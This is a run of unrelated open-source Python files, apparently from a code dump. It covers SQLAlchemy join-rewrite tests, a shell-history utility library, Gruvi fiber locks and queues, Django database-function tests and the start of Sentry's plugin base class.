"a AS a_1 JOIN "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, c.b_id AS c_b_id "
"FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
"ON a_1.id = anon_1.b_a_id ORDER BY anon_1.b_id"
)
_a_bkeyassoc = (
"SELECT a.id, b_key.id FROM a JOIN (b_key JOIN a_to_b_key "
"ON b_key.id = a_to_b_key.bid) ON a.id = a_to_b_key.aid"
)
_a_bkeyassoc_aliased = (
"SELECT a.id, b_key_1.id FROM a JOIN (b_key AS b_key_1 "
"JOIN a_to_b_key AS a_to_b_key_1 ON b_key_1.id = a_to_b_key_1.bid) "
"ON a.id = a_to_b_key_1.aid"
)
_a_atobalias_balias_c_w_exists = (
"SELECT a.id, a_to_b_1.a_id, a_to_b_1.b_id, b_1.id, b_1.a_id, "
"EXISTS (SELECT * FROM c WHERE c.b_id = b_1.id) AS anon_1 "
"FROM a LEFT OUTER JOIN "
"(a_to_b AS a_to_b_1 JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) "
"ON a.id = a_to_b_1.a_id"
)
_a_atobalias_balias = (
"SELECT a.id, a_to_b_1.a_id, a_to_b_1.b_id, b_1.id, b_1.a_id "
"FROM a LEFT OUTER JOIN (a_to_b AS a_to_b_1 "
"JOIN b AS b_1 ON b_1.id = a_to_b_1.b_id) ON a.id = a_to_b_1.a_id"
)
_b_ab1_union_c_ab2 = (
"SELECT anon_1.b_id, anon_1.b_a_id, anon_1.a_id, anon_1.b1_id, "
"anon_1.b1_a_id "
"FROM (SELECT b.id AS b_id, b.a_id AS b_a_id, a.id AS a_id, "
"b1.id AS b1_id, b1.a_id AS b1_a_id "
"FROM b JOIN (a JOIN b1 ON a.id = b1.a_id) ON a.id = b.a_id "
"UNION "
"SELECT b.id AS b_id, b.a_id AS b_a_id, a.id AS a_id, b2.id AS b2_id, "
"b2.a_id AS b2_a_id "
"FROM b JOIN (a JOIN b2 ON a.id = b2.a_id) ON a.id = b.a_id) AS anon_1"
)
_b_a_id_double_overlap_annotated = (
"SELECT anon_1.b_id, anon_1.b_a_id, anon_1.b_a_id_1 FROM "
"(SELECT b.id AS b_id, b.a_id AS b_a_id, b_a.id AS b_a_id_1 "
"FROM b JOIN b_a ON b.id = b_a.id) AS anon_1"
)
_f_b1a_where_in_b2a = (
"SELECT f.id, f.a_id "
"FROM f JOIN (a JOIN b1 ON a.id = b1.a_id) ON a.id = f.a_id "
"WHERE b1.id IN (SELECT b2.id "
"FROM a JOIN b2 ON a.id = b2.a_id)"
)
_anon_scalar_subqueries = (
"SELECT (SELECT 1) AS anon_1, (SELECT 2) AS anon_2"
)
class JoinExecTest(_JoinRewriteTestBase, fixtures.TestBase):
"""invoke the SQL on the current backend to ensure compatibility"""
__backend__ = True
_a_bc = (
_a_bc_wdupes
) = (
_a_bc_wdupes_anon_map
) = (
_a_bc_comma_a1_selbc
) = (
_a__b_dc
) = (
_a_bkeyassoc
) = (
_a_bkeyassoc_aliased
) = (
_a_atobalias_balias_c_w_exists
) = (
_a_atobalias_balias
) = (
_b_ab1_union_c_ab2
) = (
_b_a_id_double_overlap_annotated
) = _f_b1a_where_in_b2a = _anon_scalar_subqueries = None
@classmethod
def setup_class(cls):
m.create_all(testing.db)
@classmethod
def teardown_class(cls):
m.drop_all(testing.db)
def _test(self, selectable, assert_):
result = testing.db.execute(selectable)
result.close()
for col in selectable.inner_columns:
assert col in result._metadata._keymap
@testing.skip_if("oracle", "oracle's cranky")
@testing.skip_if(
"mssql", "can't query EXISTS in the columns " "clause w/o subquery"
)
def test_a_atobalias_balias_c_w_exists(self):
super(JoinExecTest, self).test_a_atobalias_balias_c_w_exists()
@testing.only_on(
"sqlite",
"non-standard aliasing rules used at the moment, "
"possibly fix this or add another test that uses "
"cross-compatible aliasing",
)
def test_b_ab1_union_b_ab2(self):
super(JoinExecTest, self).test_b_ab1_union_b_ab2()
class DialectFlagTest(fixtures.TestBase, AssertsCompiledSQL):
def test_dialect_flag(self):
d1 = default.DefaultDialect(supports_right_nested_joins=True)
d2 = default.DefaultDialect(supports_right_nested_joins=False)
j1 = b.join(c)
j2 = a.join(j1)
s = select([a, b, c], use_labels=True).select_from(j2)
self.assert_compile(
s,
"SELECT a.id AS a_id, b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, "
"c.b_id AS c_b_id FROM a JOIN (b JOIN c ON b.id = c.b_id) "
"ON a.id = b.a_id",
dialect=d1,
)
self.assert_compile(
s,
"SELECT a.id AS a_id, anon_1.b_id AS b_id, "
"anon_1.b_a_id AS b_a_id, "
"anon_1.c_id AS c_id, anon_1.c_b_id AS c_b_id "
"FROM a JOIN (SELECT b.id AS b_id, b.a_id AS b_a_id, "
"c.id AS c_id, "
"c.b_id AS c_b_id FROM b JOIN c ON b.id = c.b_id) AS anon_1 "
"ON a.id = anon_1.b_a_id",
dialect=d2,
)
| |
#!/usr/bin/python
#
# Copyright 2012 Carl Anderson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A library for general use by the advanced shell history utilities.
This library provides components used by _ash_log.py and ash_query.py for
logging, flag parsing, configuration and database management.
"""
__author__ = 'Carl Anderson (carl.anderson@gmail.com)'
# NOTE: This variable is set automatically by the Makefile.
__version__ = '0.7.r164'
import argparse
import logging
import os
import sqlite3
class Flags(argparse.ArgumentParser):
"""A class to manage all the flags for this advanced shell history utility."""
class Formatter(argparse.HelpFormatter):
"""A simple formatter whith a slightly wider set of flag names."""
def __init__(self, prog):
argparse.HelpFormatter.__init__(self, prog, max_help_position=44)
def __init__(self, arguments=None, flags=None):
"""Initialize the Flags."""
parser = argparse.ArgumentParser(formatter_class=Flags.Formatter)
# Add the standard argument-taking flags.
for short_flag, long_flag, metavar, arg_type, help_text in arguments or []:
parser.add_argument('-' + short_flag, '--' + long_flag, metavar=metavar,
type=arg_type, help=help_text)
# Add the standard no-argument-taking flags.
for short_flag, long_flag, help_text in flags or []:
parser.add_argument('-' + short_flag, '--' + long_flag,
action='store_true', help=help_text)
# Add a flag to display the version and exit.
parser.add_argument('-V', '--version', action='version', version=__version__,
help='prints the version and exits')
self._parser = parser
self.flags = parser.parse_args().__dict__
self.__dict__.update(self.flags)
def PrintHelp(self):
"""Prints the help menu."""
self._parser.print_help()
class Config(object):
"""A class to manage the configuration environment variables.
All environment variables beginning with the prefix 'ASH_CFG_' are loaded
and made accessible conveniently through an instance of this class.
For example:
ASH_CFG_HISTORY_DB='/foo/' becomes { 'HISTORY_DB': '/foo/' }
"""
def __init__(self):
"""Initialize a Config instance, reading os.environ for variables."""
# Select all the environment variables starting with 'ASH_CFG_' and strip
# off the leading ASH_CFG_ portion to use as the name of the variable.
self.variables = dict(
[(x[8:], y) for x, y in os.environ.items() if x.startswith('ASH_CFG_')]
)
def GetBool(self, variable):
"""Returns a bool value for a config variable, or None if not set."""
value = self.GetString(variable)
return value and value.strip() == 'true'
def GetString(self, variable):
"""Returns a string value for a config variable, or None if not set."""
if self.Sets(variable):
return self.variables[variable.upper().strip()]
def Sets(self, variable):
"""Returns true when the argument variable exists in the environment."""
return variable and variable.upper().strip() in self.variables
def InitLogging():
"""Initializes the logging module.
Uses the following shell environment variables to configure the logger:
ASH_CFG_LOG_DATE_FMT - to format the date strings in the log file.
ASH_CFG_LOG_LEVEL - to set the logging level (DEBUG, INFO, etc).
ASH_CFG_LOG_FILE - the filename where the logger will write.
ASH_SESSION_ID - the session id to include in the logged output.
Lines are written in roughly this format:
2012-07-17 23:59:59 PDT: SESSION 123: DEBUG: argv = "[0]='ls'"
"""
session_id = os.getenv('ASH_SESSION_ID') or 'NEW'
config = Config()
level = config.GetString('LOG_LEVEL') or 'INFO'
level = hasattr(logging, level) and getattr(logging, level) or logging.DEBUG
format = '%(asctime)sSESSION ' + session_id + ': %(levelname)s: %(message)s'
kwargs = {
'datefmt': config.GetString('LOG_DATE_FMT'),
'filename': config.GetString('LOG_FILE'),
'format': format,
'level': level,
}
logging.basicConfig(**kwargs)
class Database(object):
"""A wrapper around a database connection."""
# The name of the sqlite3 file backing the saved command history.
filename = None
class Object(object):
"""A construct for objects to be inserted into the Database."""
def __init__(self, table_name):
self.values = {}
self.table_name = table_name
sql = '''
select sql
from sqlite_master
where
type = 'table'
and name = ?;
'''
# Check that the table exists, creating it if not.
db = Database()
cur = db.cursor
try:
cur.execute(sql, (table_name,))
rs = cur.fetchone()
if not rs:
cur.execute(self.GetCreateTableSql() + ';')
db.connection.commit()
elif rs[0] != self.GetCreateTableSql().strip():
logging.warning('Table %s exists, but has an unexpected schema.',
table_name)
finally:
cur.close()
def Insert(self):
"""Insert the object into the database, returning the new rowid."""
sql = 'INSERT INTO %s ( %s ) VALUES ( %s )' % (
self.table_name,
', '.join(self.values),
', '.join(['?' for _ in self.values])
)
return Database().Execute(sql, tuple(self.values.values()))
def __init__(self):
"""Initialize a Database with an open connection to the history database."""
if Database.filename is None:
Database.filename = Config().GetString('HISTORY_DB')
self.connection = sqlite3.connect(Database.filename)
self.connection.row_factory = sqlite3.Row
self.cursor = self.connection.cursor()
def Execute(self, sql, values):
try:
self.cursor.execute(sql, values)
logging.debug('executing query: %s, values = %r', sql, values)
return self.cursor.lastrowid
except sqlite3.IntegrityError as e:
logging.debug('constraint violation: %r', e)
finally:
self.connection.commit()
self.cursor.close()
return 0
@classmethod
def SanityCheck(cls, sql):
return sql and sqlite3.complete_statement(sql)
def Fetch(self, sql, params=(), limit=None):
"""Execute a select query and return the result set."""
if self.SanityCheck(sql):
try:
self.cursor.execute(sql, params)
row = self.cursor.fetchone()
if not row: return None
headings = tuple(row.keys())
fetched = 1
if limit is None or limit <= 0:
rows = self.cursor.fetchall()
else:
rows = []
while fetched < limit:
row = self.cursor.fetchone()
if not row: break
rows.append(row)
fetched += 1
rows.insert(0, headings)
rows.insert(1, row)
return rows
except sqlite3.Error as e:
print >> sys.stderr, 'Failed to execute query: %s (%s)' % (sql, params)
return None
finally:
self.cursor.close()
self.cursor = None
| |
#
# This file is part of Gruvi. Gruvi is free software available under the
# terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2012-2014 the Gruvi authors. See the file "AUTHORS" for a
# complete list.
from __future__ import absolute_import, print_function
import fibers
import threading
import heapq
from .hub import switchpoint, get_hub, switch_back, assert_no_switchpoints
from .callbacks import add_callback, remove_callback, pop_callback
from .callbacks import run_callbacks, walk_callbacks
__all__ = ['Lock', 'RLock', 'Event', 'Condition', 'QueueEmpty', 'QueueFull',
'Queue', 'LifoQueue', 'PriorityQueue']
# All primitives in this module a thread safe!
class _Lock(object):
"""Base class for regular and reentrant locks."""
__slots__ = ('_reentrant', '_lock', '_locked', '_owner', '_callbacks')
def __init__(self, reentrant):
# Allocate a new lock
self._reentrant = reentrant
self._lock = threading.Lock()
self._locked = 0
self._owner = None
self._callbacks = None
def locked(self):
"""Whether the lock is currently locked."""
return self._locked
@switchpoint
def acquire(self, blocking=True, timeout=None):
"""Acquire the lock.
If *blocking* is true (the default), then this will block until the
lock can be acquired. The *timeout* parameter specifies an optional
timeout in seconds.
The return value is a boolean indicating whether the lock was acquired.
"""
hub = get_hub()
try:
# switcher.__call__ needs to be synchronized with a lock IF it can
# be called from different threads. This is the case here because
# this method may be called from multiple threads and the callbacks
# are run in the calling thread. So pass it our _lock.
with switch_back(timeout, lock=self._lock) as switcher:
with self._lock:
if not self._locked:
self._locked = 1
self._owner = fibers.current()
return True
elif self._reentrant and self._owner is fibers.current():
self._locked += 1
return True
elif not blocking:
return False
handle = add_callback(self, switcher)
# It is safe to call hub.switch() outside the lock. Another
# thread could have called acquire()+release(), thereby firing
# the switchback. However the switchback only schedules the
# switchback in our hub, it won't execute it yet. So the
# switchback won't actually happen until we switch to the hub.
hub.switch()
# Here the lock should be ours because _release() wakes up only
# the fiber that it passed the lock.
assert self._locked > 0
assert self._owner is fibers.current()
except BaseException as e:
# Likely a Timeout but could also be e.g. Cancelled
with self._lock:
# Clean up the callback. It might have been popped by
# _release() but that is OK.
remove_callback(self, handle)
# This fiber was passed the lock but before that an exception
# was already scheduled with run_callback() (likely through
# Fiber.throw())
if self._owner is fibers.current():
self._release()
if e is switcher.timeout:
return False
raise
return True
def _release(self):
# Low-level release. Lock must be held.
if self._locked > 1:
self._locked -= 1
return
while self._callbacks:
switcher, _ = pop_callback(self)
if switcher.active:
self._owner = switcher.fiber
switcher.switch()
return
self._owner = None
self._locked = 0
def release(self):
"""Release the lock."""
with self._lock:
if not self._locked:
raise RuntimeError('lock not currently held')
elif self._reentrant and self._owner is not fibers.current():
raise RuntimeError('lock not owned by this fiber')
self._release()
__enter__ = acquire
__exit__ = lambda self, *exc_info: self.release()
# Internal API used by Condition instances.
def _acquire_restore(self, state):
# Acquire a lock and restore the owner and lock count.
self.acquire()
self._owner, self._locked = state
def _release_save(self):
# Release a lock even if it is locked multiple times. Return the state.
state = self._owner, self._locked
self.release()
return state
class Lock(_Lock):
"""A lock.
The lock can be locked and unlocked explicitly using :meth:`acquire` and
:meth:`release`, and it can also be used as a context manager.
"""
__slots__ = _Lock.__slots__
def __init__(self):
super(Lock, self).__init__(False)
class RLock(_Lock):
"""A reentrant lock.
A reentrant lock has the notion of a "lock owner" and a "lock count". If a
reentrant lock is acquired, and it was already acquired by the current
fiber, then the lock count is increased and the acquire call will be
successful. Unlocking a reentrant lock may only be done by the lock owner.
The lock becomes unlocked only after it is released as many times as it was
acquired.
"""
__slots__ = _Lock.__slots__
def __init__(self):
super(RLock, self).__init__(True)
# A few words on the use of fiber locks (Lock) vs thread locks (threading.Lock)
# in the code below.
#
# There is no difference between both locks from a safety point of view. Both
# locks are thread-safe (which implies they are fiber-safe as well). The
# difference is who gets blocked when trying to acquire a lock that is already
# locked. With a fiber lock only the current fiber is blocked and other fibers
# in current thread can continue (and fibers in other threads as well, of
# course). With a thread lock the entire current thread is blocked including
# all its fibers.
#
# This means that if we never call hub.switch() when a lock is held, fiber and
# thread locks are completely identical. In this case there's a benefit in
# using thread locks because i) they are smaller and faster, and ii) it makes
# it possible for non-switchpoints to acquire the lock. An example of the
# latter case is Queue.put_nowait().
class Event(object):
"""An event.
An event contains an internal flag that is initially False. The flag can be
set using the :meth:`set` method and cleared using the :meth:`clear`
method. Fibers can wait for the flag to become set using :meth:`wait`.
Events are level triggered, meaning that the condition set by :meth:`set`
is "sticky". Setting the event will unblock all current waiters and will
cause future calls to :meth:`wait` not to block, until :meth:`clear` is
called again.
"""
__slots__ = ('_flag', '_lock', '_callbacks')
def __init__(self):
self._flag = False
self._lock = threading.Lock()
self._callbacks = None
def is_set(self):
return self._flag
def set(self):
"""Set the internal flag, and wake up any fibers blocked on :meth:`wait`."""
with self._lock:
if self._flag:
return
self._flag = True
with assert_no_switchpoints():
run_callbacks(self)
def clear(self):
"""Clear the internal flag."""
with self._lock:
self._flag = False
@switchpoint
def wait(self, timeout=None):
"""If the internal flag is set, return immediately. Otherwise block
until the flag gets set by another fiber calling :meth:`set`."""
# Optimization for the case the Event is already set.
if self._flag:
return True
hub = get_hub()
try:
with switch_back(timeout, lock=self._lock) as switcher:
with self._lock:
# Need to check the flag again, now under the lock.
if self._flag:
return True
# Allow other fibers to wake us up via callback in set().
# The callback goes to switcher.switch directly() instead of
# __call__(), because the latter would try to lock our lock
# which is already held when callbacks are run by set().
handle = add_callback(self, switcher.switch)
# See note in Lock.acquire() why we can call to hub.switch()
# outside the lock.
hub.switch()
except BaseException as e:
with self._lock:
remove_callback(self, handle)
if e is switcher.timeout:
return False
raise
return True
# Support for wait()
def add_done_callback(self, callback, *args):
with self._lock:
if self._flag:
callback(*args)
return
return add_callback(self, callback, args)
def remove_done_callback(self, handle):
with self._lock:
remove_callback(self, handle)
# Utility functions for a condition to work with both Locks and RLocks.
def is_locked(lock):
"""Return whether a lock is locked.
Suppors :class:`Lock`, :class:`RLock`, :class:`threading.Lock` and
:class:`threading.RLock` instances.
"""
if hasattr(lock, 'locked'):
return lock.locked()
elif hasattr(lock, '_is_owned'):
return lock._is_owned()
else:
raise TypeError('expecting Lock/RLock')
def acquire_restore(lock, state):
"""Acquire a lock and restore its state."""
if hasattr(lock, '_acquire_restore'):
lock._acquire_restore(state)
elif hasattr(lock, 'acquire'):
lock.acquire()
else:
raise TypeError('expecting Lock/RLock')
def release_save(lock):
"""Release a lock and return its state."""
if hasattr(lock, '_release_save'):
return lock._release_save()
elif hasattr(lock, 'release'):
lock.release()
else:
raise TypeError('expecting Lock/RLock')
def thread_lock(lock):
"""Return the thread lock for *lock*."""
if hasattr(lock, '_lock'):
return lock._lock
elif hasattr(lock, 'acquire'):
return lock
else:
raise TypeError('expecting Lock/RLock')
class Condition(object):
"""A condition.
A condition is always associated with a lock. The state of the condition
may only change when the caller has acquired the lock. While the lock is
held, a condition can be waited for using :meth:`wait`. The wait method
will release the lock just before blocking itself, so that another fiber
can call :meth:`notify` to notify the condition.
The difference between a condition and an :class:`Event` is that a
condition is edge-trigerred. This means that when a condition is notified,
only fibers that are waiting *at the time of notification* are unblocked.
Any fiber that calls :meth:`wait` after the notification, will block until
the next notification. This also explains why a lock is needed. Without the
lock there would be a race condition between notification and waiting.
"""
__slots__ = ('_lock', '_callbacks')
def __init__(self, lock=None):
"""
The *lock* argument can be used to share a lock between multiple
conditions. It must be a :class:`Lock` or :class:`RLock` instance. If
no lock is provided, a :class:`RLock` is allocated.
"""
self._lock = lock or RLock()
self._callbacks = None
acquire = lambda self, *args: self._lock.acquire(*args)
release = lambda self: self._lock.release()
__enter__ = lambda self: self._lock.acquire()
__exit__ = lambda self, *exc_info: self.release()
def notify(self, n=1):
"""Raise the condition and wake up fibers waiting on it.
The optional *n* parameter specifies how many fibers will be notified.
By default, one fiber is notified.
"""
if not is_locked(self._lock):
raise RuntimeError('lock is not locked')
notified = [0] # Work around lack of "nonlocal" in py27
def walker(switcher, predicate):
if not switcher.active:
return False # not not keep switcher that timed out
if predicate and not predicate():
return True
if n >= 0 and notified[0] >= n:
return True
switcher.switch()
notified[0] += 1
return False # only notify once
walk_callbacks(self, walker)
def notify_all(self):
"""Raise the condition and wake up all fibers waiting on it."""
self.notify(-1)
@switchpoint
def wait(self, timeout=None):
"""Wait for the condition to be notified.
The return value is True, unless a timeout occurred in which case the
return value is False.
The lock must be held before calling this method. This method will
release the lock just before blocking itself, and it will re-acquire it
before returning.
"""
return self.wait_for(None, timeout)
@switchpoint
def wait_for(self, predicate, timeout=None):
"""Like :meth:`wait` but additionally for *predicate* to be true.
The *predicate* argument must be a callable that takes no arguments.
Its result is interpreted as a boolean value.
"""
if not is_locked(self._lock):
raise RuntimeError('lock is not locked')
hub = get_hub()
try:
with switch_back(timeout, lock=thread_lock(self._lock)) as switcher:
handle = add_callback(self, switcher, predicate)
# See the comment in Lock.acquire() why it is OK to release the
# lock here before calling hub.switch().
# Also if this is a reentrant lock make sure it is fully released.
state = release_save(self._lock)
hub.switch()
except BaseException as e:
with self._lock:
remove_callback(self, handle)
if e is switcher.timeout:
return False
raise
finally:
acquire_restore(self._lock, state)
return True
class QueueEmpty(Exception):
"""Queue is empty."""
class QueueFull(Exception):
"""Queue is full."""
class Queue(object):
"""A synchronized FIFO queue. """
__slots__ = ('_maxsize', '_unfinished_tasks', '_heap', '_size', '_counter',
'_lock', '_notempty', '_notfull', '_alldone')
def __init__(self, maxsize=0):
"""
The *maxsize* argument specifies the maximum queue size. If it is less
than or equal to zero, the queue size is infinite.
"""
self._maxsize = maxsize
self._unfinished_tasks = 0
# Use a list/heapq even for a FIFO instead of a deque() because of the
# latter's high memory use (see comment in Lock). For most protocols
# there will be one Queue per connection so a low memory footprint is
# very important.
self._heap = []
self._size = 0
self._counter = 0
# Use a threading.Lock so that put_nowait() and get_nowait() don't need
# to be a switchpoint. Also it is more efficient.
self._lock = threading.Lock()
self._notempty = Condition(self._lock)
self._notfull = Condition(self._lock)
self._alldone = Condition(self._lock)
def _get_item_priority(self, item):
# Priority function: FIFO queue by default
self._counter += 1
return self._counter
def qsize(self):
"""Return the size of the queue, which is the sum of the size of all
its elements."""
return self._size
empty = lambda self: self.qsize() == 0
full = lambda self: self.qsize() >= self.maxsize > 0
maxsize = property(lambda self: self._maxsize)
unfinished_tasks = property(lambda self: self._unfinished_tasks)
@switchpoint
def put(self, item, block=True, timeout=None, size=None):
"""Put *item* into the queue.
If the queue is currently full and *block* is True (the default), then
wait up to *timeout* seconds for space to become available. If no
timeout is specified, then wait indefinitely.
If the queue is full and *block* is False or a timeout occurs, then
raise a :class:`QueueFull` exception.
The optional *size* argument may be used to specify a custom size for
the item. The total :meth:`qsize` of the queue is the sum of the sizes
of all the items. The default size for an item is 1.
"""
if size is None:
size = 1
with self._lock:
priority = self._get_item_priority(item)
while self._size + size > self.maxsize > 0:
if not block:
raise QueueFull
if not self._notfull.wait_for(lambda: self._size+size <= self.maxsize, timeout):
raise QueueFull
heapq.heappush(self._heap, (priority, size, item))
self._size += size
self._unfinished_tasks += 1
self._notempty.notify()
def put_nowait(self, item, size=None):
""""Equivalent of ``put(item, False)``."""
# Don't don't turn this method into a switchpoint as put() will never
# switch if block is False. This can be done by calling the function
# wrapped by the @switchpoint wrapper directly.
return self.put.__wrapped__(self, item, False, size=size)
@switchpoint
def get(self, block=True, timeout=None):
"""Pop an item from the queue.
If the queue is not empty, an item is returned immediately. Otherwise,
if *block* is True (the default), wait up to *timeout* seconds for an
item to become available. If not timeout is provided, then wait
indefinitely.
If the queue is empty and *block* is false or a timeout occurs, then
raise a :class:`QueueEmpty` exception.
"""
with self._lock:
while not self._heap:
if not block:
raise QueueEmpty
if not self._notempty.wait(timeout):
raise QueueEmpty
prio, size, item = heapq.heappop(self._heap)
self._size -= size
if 0 <= self._size < self.maxsize:
self._notfull.notify()
return item
def get_nowait(self):
""""Equivalent of ``get(False)``."""
# See note in put_nowait()
return self.get.__wrapped__(self, False)
def task_done(self):
"""Mark a task as done."""
with self._lock:
unfinished = self._unfinished_tasks - 1
if unfinished < 0:
raise RuntimeError('task_done() called too many times')
elif unfinished == 0:
self._alldone.notify()
self._unfinished_tasks = unfinished
def join(self):
"""Wait until all tasks are done."""
with self._lock:
while self._unfinished_tasks > 0:
self._alldone.wait()
class LifoQueue(Queue):
"""A queue with LIFO behavior.
See :class:`Queue` for a description of the API.
"""
__slots__ = Queue.__slots__
def _get_item_priority(self, item):
# Priority function for a LIFO queue
self._counter += 1
return -self._counter
class PriorityQueue(Queue):
"""A priority queue.
Items that are added via :meth:`~Queue.put` are typically ``(priority,
item)`` tuples. Lower values for priority indicate a higher priority.
See :class:`Queue` for a description of the API.
"""
__slots__ = Queue.__slots__
def _get_item_priority(self, item):
# Priority function for a priority queue: item should typically be a
# (priority, item) tuple
return item
| |
from __future__ import unicode_literals
from django.db.models import TextField, CharField, Value as V
from django.db.models.functions import (
Coalesce, Concat, Lower, Upper, Length, Substr,
)
from django.test import TestCase
from django.utils import six, timezone
from .models import Author, Article
lorem_ipsum = """
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua."""
class FunctionTests(TestCase):
def test_coalesce(self):
Author.objects.create(name='John Smith', alias='smithj')
Author.objects.create(name='Rhonda')
authors = Author.objects.annotate(display_name=Coalesce('alias', 'name'))
self.assertQuerysetEqual(
authors.order_by('name'), [
'smithj',
'Rhonda',
],
lambda a: a.display_name
)
with self.assertRaisesMessage(ValueError, 'Coalesce must take at least two expressions'):
Author.objects.annotate(display_name=Coalesce('alias'))
def test_coalesce_mixed_values(self):
a1 = Author.objects.create(name='John Smith', alias='smithj')
a2 = Author.objects.create(name='Rhonda')
ar1 = Article.objects.create(
title="How to Django",
text=lorem_ipsum,
written=timezone.now(),
)
ar1.authors.add(a1)
ar1.authors.add(a2)
# mixed Text and Char
article = Article.objects.annotate(
headline=Coalesce('summary', 'text', output_field=TextField()),
)
self.assertQuerysetEqual(
article.order_by('title'), [
lorem_ipsum,
],
lambda a: a.headline
)
# mixed Text and Char wrapped
article = Article.objects.annotate(
headline=Coalesce(Lower('summary'), Lower('text'), output_field=TextField()),
)
self.assertQuerysetEqual(
article.order_by('title'), [
lorem_ipsum.lower(),
],
lambda a: a.headline
)
def test_concat(self):
Author.objects.create(name='Jayden')
Author.objects.create(name='John Smith', alias='smithj', goes_by='John')
Author.objects.create(name='Margaret', goes_by='Maggie')
Author.objects.create(name='Rhonda', alias='adnohR')
authors = Author.objects.annotate(joined=Concat('alias', 'goes_by'))
self.assertQuerysetEqual(
authors.order_by('name'), [
'',
'smithjJohn',
'Maggie',
'adnohR',
],
lambda a: a.joined
)
with self.assertRaisesMessage(ValueError, 'Concat must take at least two expressions'):
Author.objects.annotate(joined=Concat('alias'))
def test_concat_many(self):
Author.objects.create(name='Jayden')
Author.objects.create(name='John Smith', alias='smithj', goes_by='John')
Author.objects.create(name='Margaret', goes_by='Maggie')
Author.objects.create(name='Rhonda', alias='adnohR')
authors = Author.objects.annotate(
joined=Concat('name', V(' ('), 'goes_by', V(')'), output_field=CharField()),
)
self.assertQuerysetEqual(
authors.order_by('name'), [
'Jayden ()',
'John Smith (John)',
'Margaret (Maggie)',
'Rhonda ()',
],
lambda a: a.joined
)
def test_concat_mixed_char_text(self):
Article.objects.create(title='The Title', text=lorem_ipsum, written=timezone.now())
article = Article.objects.annotate(
title_text=Concat('title', V(' - '), 'text', output_field=TextField()),
).get(title='The Title')
self.assertEqual(article.title + ' - ' + article.text, article.title_text)
# wrap the concat in something else to ensure that we're still
# getting text rather than bytes
article = Article.objects.annotate(
title_text=Upper(Concat('title', V(' - '), 'text', output_field=TextField())),
).get(title='The Title')
expected = article.title + ' - ' + article.text
self.assertEqual(expected.upper(), article.title_text)
def test_lower(self):
Author.objects.create(name='John Smith', alias='smithj')
Author.objects.create(name='Rhonda')
authors = Author.objects.annotate(lower_name=Lower('name'))
self.assertQuerysetEqual(
authors.order_by('name'), [
'john smith',
'rhonda',
],
lambda a: a.lower_name
)
Author.objects.update(name=Lower('name'))
self.assertQuerysetEqual(
authors.order_by('name'), [
('john smith', 'john smith'),
('rhonda', 'rhonda'),
],
lambda a: (a.lower_name, a.name)
)
def test_upper(self):
Author.objects.create(name='John Smith', alias='smithj')
Author.objects.create(name='Rhonda')
authors = Author.objects.annotate(upper_name=Upper('name'))
self.assertQuerysetEqual(
authors.order_by('name'), [
'JOHN SMITH',
'RHONDA',
],
lambda a: a.upper_name
)
Author.objects.update(name=Upper('name'))
self.assertQuerysetEqual(
authors.order_by('name'), [
('JOHN SMITH', 'JOHN SMITH'),
('RHONDA', 'RHONDA'),
],
lambda a: (a.upper_name, a.name)
)
def test_length(self):
Author.objects.create(name='John Smith', alias='smithj')
Author.objects.create(name='Rhonda')
authors = Author.objects.annotate(
name_length=Length('name'),
alias_length=Length('alias'))
self.assertQuerysetEqual(
authors.order_by('name'), [
(10, 6),
(6, None),
],
lambda a: (a.name_length, a.alias_length)
)
self.assertEqual(authors.filter(alias_length__lte=Length('name')).count(), 1)
def test_substr(self):
Author.objects.create(name='John Smith', alias='smithj')
Author.objects.create(name='Rhonda')
authors = Author.objects.annotate(name_part=Substr('name', 5, 3))
self.assertQuerysetEqual(
authors.order_by('name'), [
' Sm',
'da',
],
lambda a: a.name_part
)
authors = Author.objects.annotate(name_part=Substr('name', 2))
self.assertQuerysetEqual(
authors.order_by('name'), [
'ohn Smith',
'honda',
],
lambda a: a.name_part
)
# if alias is null, set to first 5 lower characters of the name
Author.objects.filter(alias__isnull=True).update(
alias=Lower(Substr('name', 1, 5)),
)
self.assertQuerysetEqual(
authors.order_by('name'), [
'smithj',
'rhond',
],
lambda a: a.alias
)
def test_substr_start(self):
Author.objects.create(name='John Smith', alias='smithj')
a = Author.objects.annotate(
name_part_1=Substr('name', 1),
name_part_2=Substr('name', 2),
).get(alias='smithj')
self.assertEqual(a.name_part_1[1:], a.name_part_2)
with six.assertRaisesRegex(self, ValueError, "'pos' must be greater than 0"):
Author.objects.annotate(raises=Substr('name', 0))
| |
"""
sentry.plugins.base.v1
~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
__all__ = ('Plugin',)
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from threading import local
from sentry.plugins.base.response import Response
class PluginMount(type):
def __new__(cls, name, bases, attrs):
new_cls = type.__new__(cls, name, bases, attrs)
if IPlugin in bases:
return new_cls
if not new_cls.title:
new_cls.title = new_cls.__name__
if not new_cls.slug:
new_cls.slug = new_cls.title.replace(' ', '-').lower()
return new_cls
class IPlugin(local):
"""
Plugin interface. Should not be inherited from directly.
A plugin should be treated as if it were a singleton. The owner does not
control when or how the plugin gets instantiated, nor is it guaranteed that
it will happen, or happen more than once.
>>> from sentry.plugins import Plugin # NOQA
>>> class MyPlugin(Plugin):
>>> title = 'My Plugin'
>>>
>>> def widget(self, request, group, **kwargs):
>>> return self.render('myplugin/widget.html')
All children should allow ``**kwargs`` on all inherited methods.
"""
# Generic plugin information
title = None
slug = None
description = None
version = None
author = None
author_url = None
resource_links = ()
# Configuration specifics
conf_key = None
conf_title = None
project_conf_form = None
project_conf_template = 'sentry/plugins/project_configuration.html'
site_conf_form = None
site_conf_template = 'sentry/plugins/site_configuration.html'
# Global enabled state
